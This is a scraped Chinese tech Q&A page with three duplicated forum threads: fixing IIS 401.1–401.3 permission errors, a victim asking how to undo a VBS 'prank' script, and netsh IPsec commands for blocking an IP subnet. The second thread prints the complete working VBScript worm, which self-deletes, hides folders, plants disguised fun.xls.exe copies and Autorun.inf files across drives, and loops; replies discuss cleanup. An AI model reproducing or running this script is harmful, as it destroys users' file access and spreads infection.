本页文章导读:
▪HTTP 异常 401.3 - 访问被资源 ACL 拒绝 HTTP 错误 401.3 - 访问被资源 ACL 拒绝1、错误号401.1 症状:HTTP 错误 401.1 - 未经授权:访问由于凭据无效被拒绝。 分析: 由于用户匿名访问使用的账号(默认是IUSR_机器名)被禁用,或者没有.........
▪ VBS整人代码的破解解决办法 VBS整人代码的破解急病乱投医,竟然跑到这儿来了,被人用VBS给黑了,代码如下,他说他也不会破解,给了我代码,代码如下,求解:On Error Resume NextSet fso=CreateObject("Scripting.FileSystemObject")Set .........
▪ 本地IP安全策略,该如何处理 本地IP安全策略在管理器里手动添加我会批处理的方法不太懂这是禁止一个IP1.24.00的访问我的80端口 netsh ipsec static add policy name=XBLUEnetsh ipsec static add filterlist name=ipnetsh ipsec static add filter filterl.........
[1]HTTP 异常 401.3 - 访问被资源 ACL 拒绝
来源: 互联网 发布时间: 2014-02-18
HTTP 错误 401.3 - 访问被资源 ACL 拒绝
1、错误号401.1
症状:HTTP 错误 401.1 - 未经授权:访问由于凭据无效被拒绝。
分析:
由于用户匿名访问使用的账号(默认是IUSR_机器名)被禁用,或者没有权限访问计算机,将造成用户无法访问。
:
(1)查看IIS管理器中站点安全设置的匿名帐户是否被禁用,如果是,请尝试用以下办法启用:
控制面板->管理工具->计算机管理->本地用户和组,将IUSR_机器名账号启用。如果还没有解决,请继续下一步。
(2)查看本地安全策略中,IIS管理器中站点的默认匿名访问帐号或者其所属的组是否有通过网络访问服务器的权限,如果没有尝试用以下步骤赋予权限:
开始->程序->管理工具->本地安全策略->安全策略->本地策略->用户权限分配,双击“从网络访问此计算机”,添加IIS默认用户或者其所属的组。
注意:一般自定义 IIS默认匿名访问帐号都属于组,为了安全,没有特殊需要,请遵循此规则。
2、错误号401.2
症状:HTTP 错误 401.2 - 未经授权:访问由于服务器配置被拒绝。
原因:关闭了匿名身份验证
:
运行inetmgr,打开站点属性->目录安全性->身份验证和访问控制->选中“启用匿名访问”,输入用户名,或者点击“浏览”选择合法的用户,并两次输入密码后确定。
3、错误号:401.3
症状:HTTP 错误 401.3 - 未经授权:访问由于 ACL 对所请求资源的设置被拒绝。
原因:IIS匿名用户一般属于Guests组,而我们一般把存放网站的硬盘的权限只分配给administrators组,这时候按照继承原则,网站文件夹也只有administrators组的成员才能访问,导致IIS匿名用户访问该文件的NTFS权限不足,从而导致页面无法访问。
:
给IIS匿名用户访问网站文件夹的权限,方法:进入该文件夹的安全选项,添加IIS匿名用户,并赋予相应权限,一般是读、写。
在配置IIS的时候,如果安全稍微做的好一些。就会出现各式各样的问题。比如,常见的访问网页会弹出用户名密码的登陆界面,或者是访问某种页面比如html,asp没事情,但是访问jsp或者php就有问题,显示401.3 ACL 禁止访问资源等
通常的解决办法是:
一:看iis中(不管iis5 还是iis6) ,网站或者目录,包括虚拟目录的属性,看目录安全性选项卡中的 编辑匿名访问和身份验证控制,看看是用的哪个帐号,如果是用的iis匿名帐号(一般是IUSR_机器名),或者由系统管理员设置了其他帐号,这个帐号很重要,下面成IIS匿名帐号 察看帐号的密码是否是正确的系统设置的密码,实在不行就在计算机管理里面的用户管理,重新把帐号设置一个密码,然后在编辑匿名访问和身份验证控制选项中把密码重新设置一下。
二:在资源管理器里面看放置网站或者目录的安全选项。是否IIS匿名帐号有权限访问,一般来说,NT系统中的IUSR_机器名这个帐号都会是在user组里面,有时候禁用了user组,也会引起这个问题,让刚才设置的IIS匿名帐号或者帐号所在的系统组有对目录的访问权限,至少要有读权限。
三:在你放置的程序中,看是否含有其他类型的动态语言写的程序,IIS会默认对asp进行解释,对于ASPX来说,要看net执行文件目录是否让IIS匿名帐号有读权限?cgi程序就是perl目录,jsp看是用resin还是用tomcat做的解释,php就是php目录,要保证这些目录都让IIS匿名帐号有读权限才行。
四:或者是因为(诸如php.exe php.ini php5isapi.dll).PhpMyadmin这些文件或文夹被去掉了users权限所致
昨天我也遇见这样的问题,重装下IIS就OK了
学习 给点分
我无论怎样试都不行啊
1、错误号401.1
症状:HTTP 错误 401.1 - 未经授权:访问由于凭据无效被拒绝。
分析:
由于用户匿名访问使用的账号(默认是IUSR_机器名)被禁用,或者没有权限访问计算机,将造成用户无法访问。
:
(1)查看IIS管理器中站点安全设置的匿名帐户是否被禁用,如果是,请尝试用以下办法启用:
控制面板->管理工具->计算机管理->本地用户和组,将IUSR_机器名账号启用。如果还没有解决,请继续下一步。
(2)查看本地安全策略中,IIS管理器中站点的默认匿名访问帐号或者其所属的组是否有通过网络访问服务器的权限,如果没有尝试用以下步骤赋予权限:
开始->程序->管理工具->本地安全策略->安全策略->本地策略->用户权限分配,双击“从网络访问此计算机”,添加IIS默认用户或者其所属的组。
注意:一般自定义 IIS默认匿名访问帐号都属于组,为了安全,没有特殊需要,请遵循此规则。
2、错误号401.2
症状:HTTP 错误 401.2 - 未经授权:访问由于服务器配置被拒绝。
原因:关闭了匿名身份验证
:
运行inetmgr,打开站点属性->目录安全性->身份验证和访问控制->选中“启用匿名访问”,输入用户名,或者点击“浏览”选择合法的用户,并两次输入密码后确定。
3、错误号:401.3
症状:HTTP 错误 401.3 - 未经授权:访问由于 ACL 对所请求资源的设置被拒绝。
原因:IIS匿名用户一般属于Guests组,而我们一般把存放网站的硬盘的权限只分配给administrators组,这时候按照继承原则,网站文件夹也只有administrators组的成员才能访问,导致IIS匿名用户访问该文件的NTFS权限不足,从而导致页面无法访问。
:
给IIS匿名用户访问网站文件夹的权限,方法:进入该文件夹的安全选项,添加IIS匿名用户,并赋予相应权限,一般是读、写。
在配置IIS的时候,如果安全稍微做的好一些。就会出现各式各样的问题。比如,常见的访问网页会弹出用户名密码的登陆界面,或者是访问某种页面比如html,asp没事情,但是访问jsp或者php就有问题,显示401.3 ACL 禁止访问资源等
通常的解决办法是:
一:看iis中(不管iis5 还是iis6) ,网站或者目录,包括虚拟目录的属性,看目录安全性选项卡中的 编辑匿名访问和身份验证控制,看看是用的哪个帐号,如果是用的iis匿名帐号(一般是IUSR_机器名),或者由系统管理员设置了其他帐号,这个帐号很重要,下面成IIS匿名帐号 察看帐号的密码是否是正确的系统设置的密码,实在不行就在计算机管理里面的用户管理,重新把帐号设置一个密码,然后在编辑匿名访问和身份验证控制选项中把密码重新设置一下。
二:在资源管理器里面看放置网站或者目录的安全选项。是否IIS匿名帐号有权限访问,一般来说,NT系统中的IUSR_机器名这个帐号都会是在user组里面,有时候禁用了user组,也会引起这个问题,让刚才设置的IIS匿名帐号或者帐号所在的系统组有对目录的访问权限,至少要有读权限。
三:在你放置的程序中,看是否含有其他类型的动态语言写的程序,IIS会默认对asp进行解释,对于ASPX来说,要看net执行文件目录是否让IIS匿名帐号有读权限?cgi程序就是perl目录,jsp看是用resin还是用tomcat做的解释,php就是php目录,要保证这些目录都让IIS匿名帐号有读权限才行。
四:或者是因为(诸如php.exe php.ini php5isapi.dll).PhpMyadmin这些文件或文夹被去掉了users权限所致
昨天我也遇见这样的问题,重装下IIS就OK了
学习 给点分
我无论怎样试都不行啊
[2] VBS整人代码的破解解决办法
来源: 互联网 发布时间: 2014-02-18
VBS整人代码的破解
急病乱投医,竟然跑到这儿来了,被人用VBS给黑了,代码如下,他说他也不会破解,给了我代码,代码如下,求解:
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set Cx=fso.GetSpecialFolder(0)
fso.GetFile(WScript.ScriptFullName).Delete(True)
Do
C=fso.GetParentFolderName(Cx)
Set Fdrs=fso.GetFolder(C).SubFolders
For Each Fdr In Fdrs
If Not fso.GetExtensionName(Fdr.Name)="exe" Then
fso.CreateFolder(C & Fdr.Name & ".exe")
Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe")
fun.Attributes=6
fun.Copy(C & Fdr.Name & ".exe\fun.xls.exe")
Set auto=fso.CreateTextFile(C & Fdr.Name & ".exe\Autorun.inf")
auto.WriteLine("[Autorun]")
auto.WriteLine("Open=fun.xls.exe")
auto.Close
Set auto=Nothing
Set fun=Nothing
fso.GetFolder(C & Fdr.Name & ".exe").Attributes=Fdr.Attributes
Fdr.Attributes=6
End If
Next
Set Cx=Nothing
Set Fdrs=Nothing
Set drvs=fso.Drives
For Each drv In drvs
If drv.DriveType=2 Then
If drv & "\" = C Then
Else
Set Fdrs=fso.GetFolder(drv).SubFolders
For Each Fdr In Fdrs
If Not fso.GetExtensionName(Fdr.Name)="exe" Then
Fdr.Name=Fdr.name & ".exe"
Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe")
fun.Copy(drv & "\" & Fdr.Name & "\fun.xls.exe")
Set auto=fso.CreateTextFile(drv & "\" & Fdr.Name & "\Autorun.inf")
auto.WriteLine("[Autorun]")
auto.WriteLine("Open=fun.xls.exe")
auto.Close
Set auto=Nothing
Set fun=Nothing
End If
Next
End If
End If
Next
WScript.Sleep 60*1000
Loop
效果如下:
1.桌面几乎全部快捷方式被删除
2.所有文件夹被重名名为文件夹名.exe
3.几乎所有文件关联失效
4。每个文件夹内都会有一个内容为:
[Autorun]
Open=fun.xls.exe
的AUTORUN.INF的文件和一个
fun.xls.exe的隐藏文件
都这样了还搞个毛啊……
代码不难,功能也很明确,但这东西是不可逆的啊,快捷方式删了找回来很麻烦,不如自己重建吧。文件关联被删了这个有点老火,可以考虑在别人的机器里把文件关联的注册表文件导出来再导入你的注册表,那些由VBS建的文件手动删吧,有水平可以自己写程序删,反正我搞不定……
这个毒还真遇到过,不过一眼就看穿了。。。
用文件夹+.exe的方式,我见过的只有fun.xls这个毒,确实比较搞笑~
脚本写的不怎么样,心黑脸皮厚就行了。
楼主贴出来代码,可能被人恶意利用哦
急病乱投医,竟然跑到这儿来了,被人用VBS给黑了,代码如下,他说他也不会破解,给了我代码,代码如下,求解:
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set Cx=fso.GetSpecialFolder(0)
fso.GetFile(WScript.ScriptFullName).Delete(True)
Do
C=fso.GetParentFolderName(Cx)
Set Fdrs=fso.GetFolder(C).SubFolders
For Each Fdr In Fdrs
If Not fso.GetExtensionName(Fdr.Name)="exe" Then
fso.CreateFolder(C & Fdr.Name & ".exe")
Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe")
fun.Attributes=6
fun.Copy(C & Fdr.Name & ".exe\fun.xls.exe")
Set auto=fso.CreateTextFile(C & Fdr.Name & ".exe\Autorun.inf")
auto.WriteLine("[Autorun]")
auto.WriteLine("Open=fun.xls.exe")
auto.Close
Set auto=Nothing
Set fun=Nothing
fso.GetFolder(C & Fdr.Name & ".exe").Attributes=Fdr.Attributes
Fdr.Attributes=6
End If
Next
Set Cx=Nothing
Set Fdrs=Nothing
Set drvs=fso.Drives
For Each drv In drvs
If drv.DriveType=2 Then
If drv & "\" = C Then
Else
Set Fdrs=fso.GetFolder(drv).SubFolders
For Each Fdr In Fdrs
If Not fso.GetExtensionName(Fdr.Name)="exe" Then
Fdr.Name=Fdr.name & ".exe"
Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe")
fun.Copy(drv & "\" & Fdr.Name & "\fun.xls.exe")
Set auto=fso.CreateTextFile(drv & "\" & Fdr.Name & "\Autorun.inf")
auto.WriteLine("[Autorun]")
auto.WriteLine("Open=fun.xls.exe")
auto.Close
Set auto=Nothing
Set fun=Nothing
End If
Next
End If
End If
Next
WScript.Sleep 60*1000
Loop
效果如下:
1.桌面几乎全部快捷方式被删除
2.所有文件夹被重名名为文件夹名.exe
3.几乎所有文件关联失效
4。每个文件夹内都会有一个内容为:
[Autorun]
Open=fun.xls.exe
的AUTORUN.INF的文件和一个
fun.xls.exe的隐藏文件
都这样了还搞个毛啊……
代码不难,功能也很明确,但这东西是不可逆的啊,快捷方式删了找回来很麻烦,不如自己重建吧。文件关联被删了这个有点老火,可以考虑在别人的机器里把文件关联的注册表文件导出来再导入你的注册表,那些由VBS建的文件手动删吧,有水平可以自己写程序删,反正我搞不定……
这个毒还真遇到过,不过一眼就看穿了。。。
用文件夹+.exe的方式,我见过的只有fun.xls这个毒,确实比较搞笑~
脚本写的不怎么样,心黑脸皮厚就行了。
楼主贴出来代码,可能被人恶意利用哦
[3] 本地IP安全策略,该如何处理
来源: 互联网 发布时间: 2014-02-18
本地IP安全策略
在管理器里手动添加我会
批处理的方法不太懂
这是禁止一个IP1.24.00的访问我的80端口
netsh ipsec static add policy name=XBLUE
netsh ipsec static add filterlist name=ip
netsh ipsec static add filter filterlist=ip srcaddr=1.24.0.0 dstaddr=Me dstport=80 protocol=TCP
netsh ipsec static add filteraction name=禁止访问 action=block
netsh ipsec static add rule name=kill80 policy=XBLUE filterlist=ip filteraction=禁止访问
我想禁止一个特定IP子网的访问要怎么写那???自己搞了好久都没搞出来
求高人指点一下
为什么一定要用批处理呢? 用GPO 的话, 可以参考这个文档http://www.fangxinidc.com/faq/anquan/181.html
netsh ipsec static add policy name=BLOCK
netsh ipsec static add filterlist name=ip
netsh ipsec static add filter filterlist=ip srcaddr=1.24.*.* dstaddr=Me
netsh ipsec static add filteraction name=禁止访问 action=block
netsh ipsec static add rule name=blocksubnet policy=BLOCK filterlist=ip filteraction=禁止访问
把端口屏蔽掉,然后再开例外就可以了,只是个思路。
对,列外
开始菜单-控制面板-本地安全策略-IP安全策略-创建IP安全策略-然后根据向导一步一步来(注意这里有个选项不能选“激活默认响应规则”为空,不要选)-创建完新的IP策略后,直接编辑属性-在对话框上选择添加(这里要取消“使用添加向导”)-接着再点击添加-给新的IP筛选器取个名字例如:"禁止访问"-还是点击“添加”(不选择“使用添加向导”)-在弹出的对话框里的源地址一栏选择“一个特定的IP地址”-然后填入你要禁止访问的IP-在目标地址一栏中选择“我的IP地址”-点选“协议”对话框-在“选择协议类型”中选择想要禁止该地址访问的端口协议,一般为“TCP”和“UDP”,例如:禁止该地址访问TCP-80端口,这里就选择TCP协议-下面选择“到此端口”-在空白处填入“80”(为端口号)-点击确定-确定-点选你刚才新建的IP筛选器“禁止访问”-在对话框上选择“筛选器操作”-添加(不选择“使用添加向导”)-在“安全措施”选项卡中选择“阻止”-在“常规”选项卡中给你的筛选器策略取个名字“例如:禁止”-点击应用确定-在对话框内选择你新建的筛选器操作策略“禁止”-点击“应用”“确定”-接着点击“应用”-“确定”-然后在你新建的IP策略上点击右键-点选“指派”操作就完成了。。。
以上操作看起来复杂,其实,实际操作一遍后,就会觉得很简单了,以后如果想禁用那条IP进站,就可以很方便的操作了。。
这个要计算出子网掩码比如你要屏蔽192.168.0.0,那参数就是
srcaddr=192.168.0.0
srcmask=24
在管理器里手动添加我会
批处理的方法不太懂
这是禁止一个IP1.24.00的访问我的80端口
netsh ipsec static add policy name=XBLUE
netsh ipsec static add filterlist name=ip
netsh ipsec static add filter filterlist=ip srcaddr=1.24.0.0 dstaddr=Me dstport=80 protocol=TCP
netsh ipsec static add filteraction name=禁止访问 action=block
netsh ipsec static add rule name=kill80 policy=XBLUE filterlist=ip filteraction=禁止访问
我想禁止一个特定IP子网的访问要怎么写那???自己搞了好久都没搞出来
求高人指点一下
为什么一定要用批处理呢? 用GPO 的话, 可以参考这个文档http://www.fangxinidc.com/faq/anquan/181.html
netsh ipsec static add policy name=BLOCK
netsh ipsec static add filterlist name=ip
netsh ipsec static add filter filterlist=ip srcaddr=1.24.*.* dstaddr=Me
netsh ipsec static add filteraction name=禁止访问 action=block
netsh ipsec static add rule name=blocksubnet policy=BLOCK filterlist=ip filteraction=禁止访问
把端口屏蔽掉,然后再开例外就可以了,只是个思路。
对,列外
开始菜单-控制面板-本地安全策略-IP安全策略-创建IP安全策略-然后根据向导一步一步来(注意这里有个选项不能选“激活默认响应规则”为空,不要选)-创建完新的IP策略后,直接编辑属性-在对话框上选择添加(这里要取消“使用添加向导”)-接着再点击添加-给新的IP筛选器取个名字例如:"禁止访问"-还是点击“添加”(不选择“使用添加向导”)-在弹出的对话框里的源地址一栏选择“一个特定的IP地址”-然后填入你要禁止访问的IP-在目标地址一栏中选择“我的IP地址”-点选“协议”对话框-在“选择协议类型”中选择想要禁止该地址访问的端口协议,一般为“TCP”和“UDP”,例如:禁止该地址访问TCP-80端口,这里就选择TCP协议-下面选择“到此端口”-在空白处填入“80”(为端口号)-点击确定-确定-点选你刚才新建的IP筛选器“禁止访问”-在对话框上选择“筛选器操作”-添加(不选择“使用添加向导”)-在“安全措施”选项卡中选择“阻止”-在“常规”选项卡中给你的筛选器策略取个名字“例如:禁止”-点击应用确定-在对话框内选择你新建的筛选器操作策略“禁止”-点击“应用”“确定”-接着点击“应用”-“确定”-然后在你新建的IP策略上点击右键-点选“指派”操作就完成了。。。
以上操作看起来复杂,其实,实际操作一遍后,就会觉得很简单了,以后如果想禁用那条IP进站,就可以很方便的操作了。。
这个要计算出子网掩码比如你要屏蔽192.168.0.0,那参数就是
srcaddr=192.168.0.0
srcmask=24
最新技术文章: